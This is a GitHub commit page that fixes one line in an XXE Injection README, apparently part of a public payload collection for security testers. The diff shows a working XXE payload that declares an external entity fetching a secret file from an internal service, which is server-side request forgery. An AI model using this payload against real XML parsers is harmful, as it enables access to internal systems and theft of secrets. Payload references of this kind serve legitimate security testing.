Skip to content

Commit 24527a5

Browse files
authored
Merge pull request #791 from piranhaAD/patch-1
Correcting the Payload for xxe ssrf
2 parents 832b54f + aa85b80 commit 24527a5

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

XXE Injection/README.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -155,7 +155,7 @@ XXE can be combined with the [SSRF vulnerability](https://github.com/swisskyrepo
155155
<?xml version="1.0" encoding="ISO-8859-1"?>
156156
<!DOCTYPE foo [
157157
<!ELEMENT foo ANY >
158-
<!ENTITY % xxe SYSTEM "http://internal.service/secret_pass.txt" >
158+
<!ENTITY xxe SYSTEM "http://internal.service/secret_pass.txt" >
159159
]>
160160
<foo>&xxe;</foo>
161161
```

0 commit comments

Comments
 (0)